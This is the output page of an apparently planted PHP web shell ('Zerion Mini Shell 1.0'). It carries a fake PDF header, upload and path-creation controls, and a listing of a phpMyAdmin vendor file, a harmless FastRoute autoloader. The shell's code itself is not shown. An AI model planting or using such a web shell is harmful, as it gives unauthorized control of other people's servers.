%PDF- %PDF-
Mini Shell

Mini Shell

Direktori : /proc/self/root/home/infra/phpmyadmin/vendor/nikic/fast-route/src/
Upload File :
Create Path :
Current File : //proc/self/root/home/infra/phpmyadmin/vendor/nikic/fast-route/src/bootstrap.php

<?php

namespace FastRoute;

require __DIR__ . '/functions.php';

spl_autoload_register(function ($class) {
    if (strpos($class, 'FastRoute\\') === 0) {
        $name = substr($class, strlen('FastRoute'));
        require __DIR__ . strtr($name, '\\', DIRECTORY_SEPARATOR) . '.php';
    }
});

Zerion Mini Shell 1.0